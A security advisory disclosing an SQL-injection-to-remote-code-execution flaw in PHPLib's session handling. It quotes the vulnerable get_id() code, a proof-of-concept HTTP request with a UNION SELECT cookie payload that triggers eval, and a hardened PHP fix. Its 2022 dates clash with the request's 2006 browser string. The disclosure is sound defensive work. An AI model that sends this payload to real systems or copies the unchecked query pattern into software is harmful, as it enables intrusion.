PHPLib Remote Code Execution
March 5, 2022
Vendor : PHPLib
Version : PHPLib <= 7.4
Risk : Remote Code Execution

The PHP Base Library, aka PHPLib, is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL injection issues that in a worst-case scenario can lead to remote code execution, by using UNION to select arbitrary PHP code into an eval call. A new version of PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible.

Remote Code Execution:
There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL injection and/or remote code execution.
  ## Propagate the session id according to mode and lifetime.
  ## Will create a new id if necessary. To take over abandoned sessions,
  ## one may provide the new session id as a parameter (not recommended).
  function get_id($id = "") {
    # the request arrays are plain globals in this PHP generation, not superglobals
    global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS;
    $this->name = $this->cookiename==""?$this->classname:$this->cookiename;

    if ( "" == $id ) {
      switch ($this->mode) {
        case "get":
          # id taken verbatim from the query string, or from POST as a fallback
          $id = isset($HTTP_GET_VARS[$this->name]) ?
                $HTTP_GET_VARS[$this->name] :
                ( isset($HTTP_POST_VARS[$this->name]) ?
                $HTTP_POST_VARS[$this->name] :
                "") ;
        break;

        case "cookie":
          # id taken verbatim from the session cookie
          $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
                $HTTP_COOKIE_VARS[$this->name] : "";
        break;

        default:
          die("This has not been coded yet.");
      }
    }

    ### do not accept user provided ids for creation
    if($id != "" && $this->block_alien_sid) {   # somehow an id was provided by the user
       # $id is still the raw GET/POST/cookie value at this point: nothing has
       # validated or escaped it before it is used in the query inside ac_get_value()
       if($this->that->ac_get_value($id, $this->name) == "") {
          # no - the id doesn't exist in the database: Ignore it!
          $id = "";
       }
    }
    return $id;   # the rest of the original function (new id creation) is not shown here
  }

The above code is from lines 85-121. The variable $id gets its value from either GET or COOKIE and is never made safe before being passed to the function ac_get_value(), which uses the variable in a query, thus allowing SQL injection. Moreover, it is possible to manipulate the query so that PHP code is returned and passed to a vulnerable eval call.
GET /phplib/pages/index.php3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20060111 Firefox/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2022 18:24:34 GMT
For example, the above request, made to the index.php3 script that is shipped with phplib, will successfully execute the phpinfo call.
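To make the lookup described above concrete, here is an added example (not PHPLib's own code) that models the unchecked ac_get_value() query over an in-memory SQLite table next to a hardened version that validates the id's shape and binds the query values. The active_sessions table layout (sid, name, val) and the 32-character hex session-id format are assumptions made for this illustration.

```php
<?php
// Added example, not PHPLib code. The table layout and the 32-hex id format
// are assumptions; the cookie value below is the one from the request above.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE active_sessions (sid TEXT, name TEXT, val TEXT)");
// constructed sample row: one legitimate, existing session
$db->exec("INSERT INTO active_sessions VALUES "
        . "('0123456789abcdef0123456789abcdef', 'Example_Session', 'a:0:{}')");

// Mirrors the original behaviour: $id is interpolated straight into the SQL,
// so a crafted id can UNION an arbitrary string in as the "stored" session
// value, which is what later reaches eval().
function ac_get_value_vulnerable(PDO $db, string $id, string $name): string {
    $sql = "SELECT val FROM active_sessions WHERE sid = '$id' AND name = '$name'";
    $row = $db->query($sql)->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : "";
}

// Hardened lookup: refuse anything that is not a well-formed session id before
// it gets near SQL, and bind the values instead of interpolating them.
function ac_get_value_hardened(PDO $db, string $id, string $name): string {
    if (!preg_match('/^[0-9a-f]{32}$/', $id)) {
        return "";   // alien or malformed id: treated as "no such session"
    }
    $stmt = $db->prepare("SELECT val FROM active_sessions WHERE sid = ? AND name = ?");
    $stmt->execute([$id, $name]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : "";
}

$name = 'Example_Session';
$good = '0123456789abcdef0123456789abcdef';
$bad  = "' UNION SELECT 'cGhwaW5mbygpOw=='/*";   // cookie value from the request above

foreach (['vulnerable' => 'ac_get_value_vulnerable',
          'hardened'   => 'ac_get_value_hardened'] as $label => $fn) {
    // the vulnerable lookup hands back the attacker-chosen string for $bad;
    // the hardened one returns "" for it and still finds the real session
    printf("%-10s good id -> %s\n", $label, var_export($fn($db, $good, $name), true));
    printf("%-10s bad id  -> %s\n", $label, var_export($fn($db, $bad, $name), true));
}
```

Run with the php CLI (pdo_sqlite enabled) to see the vulnerable lookup return the injected base64 string while the hardened lookup returns an empty value for the same input.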

PHPLib 7.4a has been released to address these issues.

James Bercegay of the GulfTech Security Research Team